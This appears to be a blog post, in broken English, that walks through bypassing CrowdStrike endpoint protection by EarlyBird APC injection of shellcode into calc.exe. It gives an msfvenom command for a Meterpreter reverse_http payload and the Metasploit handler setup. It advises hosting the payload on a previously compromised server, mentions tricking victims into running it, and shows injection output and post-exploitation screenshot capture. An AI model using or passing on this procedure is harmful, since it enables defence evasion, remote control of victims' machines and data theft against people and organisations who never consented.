EarlyBird nabs CrowdStrike’s worm

using code injection of shell into trusted process (64-bit)

Firstly, this works 64-bit Win7 only or 64-bit Win10 only and since EarlyBird is C++ attack, all executable must compile for target victim arch in concert join to selected payload. Must have known-good exec like CALC for injection to success. So to accomplish this attack, you need web server under attacker control. Victim must have C++ redistributable installed which fairly common to date. Attacker need Visual Studio. Have tested this with modules as below:

And grab the EarlyBird tool from GitHub

First must transform shellcode (use your favourite in place of this) to be used in template later:

msfvenom -p windows/x64/meterpreter/reverse_http lhost=x.x.x.x lport=4444 -f c

Cut/paste the shellcode from step 1 into sc_x64 variable approximate location line 13 in EarlyBird.cpp

unsigned char sc_x64[] =

Now using some thing i.e. MS Visual Studio on attacker, build CPP into executable.

This is best use web server not own by attacker but some compromise previous web server. If needed, can run simple Python web server as this:

pythom -m SimpleHTTPServer 8000

(starts web server on port 8000 of attacker box default)

Start msfconsole on attacker box then:

  • use multi/handler
     …. (this set up listener)

  • set payload windows/x64/meterpreter/reverse_http

  • set LHOST x.x.x.x
     …. (this is attacker IP)

  • set LPORT 4444
     …. (this is local port must match step 1)

  • run

In real world, must trick victim in download EarlyBird and then run against known-trust Windows exec like CALC.EXE  but will not discussion here

Let assume control of victim, download compiled EarlyBird by visit http://attacker:8000/EarlyBird.exe
Then, open CMD and run:

| C:UsersDownloads> EarlyBird.exe C:WindowsSystem32calc.exe
| [*] Creating process in suspended state
| [*] Create process successful!
| [*] Allocating memory in process
| [*] Memory allocated at: 0xb0ab0000
| [*] Writing shellcode to process
| [*] Shellcode is written to memory
| [*] Queue APC
| [*] QueueAPC is done
| [*] Resuing thread….

Once attacker emit reverse shell via msfconsole now can perform fun post-exploitation tools like enumerate box or capture screenshot, as example only:

| meterpreter > sysinfo
| Computer : DELL-XP200
| OS : Windows 10 (Build 16299)
| Architecture : x64
| System Language : en_US
| Domain : CORP
| Logged On Users : 2
| Meterpreter : x86/windows
|
| meterpreter > screenshot
| Screenshot saved to: /root/Documents/test/xfer/ll2yp8Sg.jpeg

I have success test/exploit this personally bypass CrowdStrik and tell others but told this is normal. THIS IS NOT NORMAL to be bypass all this ways with what not cheap software for big big companies! Test notes:

  • Success with EarlyBird + standard HTTP meterpreter payload

  • Success with EarlyBird + standard HTTPS meterpreter payload

  • Success with screenshot command meterpreter

  • Failure with shell command launch

Eager to know if other can improve my result and get more MSF command to work would be fun to try! Plz link to me and let me know!

Link to 5 other bypess

Read more…

Leave a Reply